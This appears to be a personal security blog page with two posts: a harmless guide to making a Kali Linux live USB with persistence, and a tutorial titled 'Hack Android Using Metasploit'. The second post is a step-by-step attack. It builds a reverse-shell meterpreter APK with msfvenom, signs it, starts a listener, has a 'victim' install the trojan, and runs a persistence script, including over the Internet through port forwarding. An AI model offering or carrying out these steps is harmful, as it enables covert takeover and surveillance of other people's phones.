Friday, 28 April 2017

Kali Linux Live With Persistence

First, you'll need a program to install Kali on your USB drive and make it bootable. My program of choice is Universal USB Installer, as it's painfully easy to use and it has direct links to many Linux distros' download pages within the program.

Search for this button, and get the program. Once you run it, you'll see a disclaimer page. Accept it (or read it first, if you feel like it), and you'll be presented with the configuration section (after a few seconds). Choose Kali from the dropdown menu:

Once you have downloaded your Kali image, select it:

And then choose the drive letter for your USB drive (you probably won't need to use that checkbox on the right side). Be careful when doing this: double-check the letter so you don't format the wrong drive.

I'd recommend checking the box that formats your USB drive. That'll wipe your whole USB drive, so make sure you back up everything you had there before proceeding. It'll do a quick format, so there's no reason to avoid this.

Click on Create, then Yes, and it'll do the whole process by itself. The longest part will be extracting the ISO to your USB, but it'll be over in a matter of minutes.

If everything went as expected, you'll see this, and you have a USB you can Live boot your Kali from.


Setting Up Persistence
You like Live booting from USB, but you want to save changes made to your OS, or just files (such as .pcap files), onto your USB drive? You'll need to set up Persistence. Your USB drive must have 8 GB+ of storage space.
Download MiniTool Partition Wizard Free, install it, run it and then choose Launch Application.
Right click on your USB drive, and click on Move/Resize.

Use the small black arrow keys to shrink the partition size. It will leave a bit of storage space free, but if you type in the Partition Size manually, the program may fail. Click OK.

A new big grey chunk of unallocated space has appeared! Right click on it and click on Create. It'll warn us that Windows won't be able to see that partition, but we don't care about that ;)

Pick these options:
· Create as: Primary
· File System: Ext4
· Partition Label: persistence
Then click OK.

Now click on Apply (upper left corner), and just wait for it to complete the tasks.

Setting Up The Persistence

Once the partition manager has finished, reboot your computer and boot from your USB drive. Choose the option "Live USB Persistence", and once it's booted up, open a Terminal and use these commands:

Determine which partition of your drive you'll use:

fdisk -l

Remember your drive had a FAT32 partition and an Ext4 (Linux) one? The Ext4 one is the persistence partition (it's /dev/sdc2 in the commands below, but check the fdisk output, as the device name can differ on your system).

Make a directory on the filesystem to mount your USB:

mkdir -p /mnt/my_usb

Mount the partition on the directory you made (don't click the desktop icon labeled persistence!):

mount /dev/sdc2 /mnt/my_usb

Add a configuration file to enable persistence:

echo "/ union" > /mnt/my_usb/persistence.conf

Unmount the partition and reboot:

umount /dev/sdc2 && reboot

Now, if you boot into Live USB Persistence, you'll be able to save stuff anywhere on your Linux filesystem, and every configuration you make locally will be there on any machine you plug the USB into :)
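The same five steps as a small script, added here as an example and not part of the original post. It assumes the second USB partition was labelled "persistence" and formatted Ext4 as described above and that it runs as root on the live Kali; it finds the partition by label instead of hard-coding /dev/sdc2, refuses anything that isn't ext4, and checks the written persistence.conf before unmounting.

```shell
#!/bin/sh
# Added example: automate the persistence.conf step of the post above.
# Assumes the ext4 partition carries the label "persistence" (set in MiniTool)
# and that this runs as root from the live Kali session. Only --apply touches disks.
set -eu

# Verify a persistence.conf holds the single expected "/ union" line.
check_persistence_conf() {
    grep -qx '/ union' "$1"
}

# Write the one-line config that tells live-boot to overlay the whole
# filesystem ("/ union") onto this partition, then re-read it to be sure.
write_persistence_conf() {
    dir="$1"
    printf '/ union\n' > "$dir/persistence.conf"
    check_persistence_conf "$dir/persistence.conf"
}

# Locate the partition by label (blkid -L) rather than guessing /dev/sdc2,
# and refuse it unless it really is ext4: the FAT32 partition will not work.
find_persistence_partition() {
    dev=$(blkid -L persistence) || { echo "no partition labelled persistence" >&2; return 1; }
    fstype=$(blkid -o value -s TYPE "$dev")
    [ "$fstype" = "ext4" ] || { echo "$dev is $fstype, not ext4" >&2; return 1; }
    printf '%s\n' "$dev"
}

main() {
    dev=$(find_persistence_partition)
    mnt=/mnt/my_usb
    mkdir -p "$mnt"
    mount "$dev" "$mnt"
    write_persistence_conf "$mnt"
    umount "$mnt"
    echo "persistence.conf written on $dev; reboot and choose Live USB Persistence"
}

# Only modify the USB when explicitly asked, so the functions can be sourced or tested.
if [ "${1:-}" = "--apply" ]; then
    main
fi
```

Run it as `sh setup-persistence.sh --apply` from the live session; without the flag it only defines the functions.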

Wednesday, 15 February 2017

Hack Android Using Metasploit

1. Open a terminal.
2. Generate the apk by typing:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Port to Listen> R > /root/Desktop/<anything>.apk

(replace LHOST with your own IP)

Note: You can also hack android on WAN, i.e. through the Internet, by using your Public/External IP in LHOST and by port forwarding.

3. Now we must generate a keystore and sign our apk, because if we don't, the app won't install on some devices or some versions of android where an app signature is required.
4. For Generating the Keystore:


keytool -genkey -v -keystore /root/Desktop/my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000



5. Enter a six-digit password and remember it.
6. Fill in all the details and answer Yes to the last question. The keystore will be created. You will be asked for the password again.

7. Now we have to sign the apk file using this keystore. To do this, type:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/Desktop/my-release-key.keystore my_application.apk alias_name

When it asks for the passphrase, enter the password you entered earlier.

8. Load metasploit console, by typing:

msfconsole

9. After it loads (it will take time), load the multi-handler exploit by typing:

use exploit/multi/handler


10. Set up a (reverse) payload by typing:

set payload android/meterpreter/reverse_tcp

11. To set LHOST, type:

set LHOST <Your IP>

Note: Even if you are hacking on WAN, type your private/internal IP here, not the public/external one.

12. Finally, type exploit to start the listener.

13. Copy the application that you made (Anything.apk) from the root folder to your android phone.
14. Then send the apk file to the phone you want to hack.
15. Let the Victim install the app.
Note: Installation of apps from Unknown Sources must be enabled (if it isn't already) in the security settings of the android phone to allow the Trojan to install.
16. And when he clicks Open, there comes the meterpreter prompt.

17. Download Persistent.sh
18. Upload the file to the device in /sdcard/Download.

19. cd /  (To go to the Root Directory), then navigate to /sdcard/Download/ using cd.

20. To upload the file, use the command:

upload /root/Desktop/Persistent.sh

21. Now, all we must do is execute the script once, and then everything will be done by the script automatically.
22. Drop into the system's shell by typing:

shell

23. Now, navigate to the location of the script:
cd /
cd /sdcard/Download
ls

24. Now it's time for EXECUTION. Type:

sh Persistent.sh

Things To Remember:

The persistence of the backdoor will only remain until a reboot of the android system.
If you are hacking on WAN and you have a dynamic Public IP, then the persistence will only remain until your router reboots / your IP changes.

Remember to reboot the android to eliminate the running script, if you are testing on your own Android system.
If the Victim's Android system is Rooted and your Public IP is Static, then:

1) The Persistence will remain forever on WAN!
2) The Persistence will remain forever on LAN, obviously.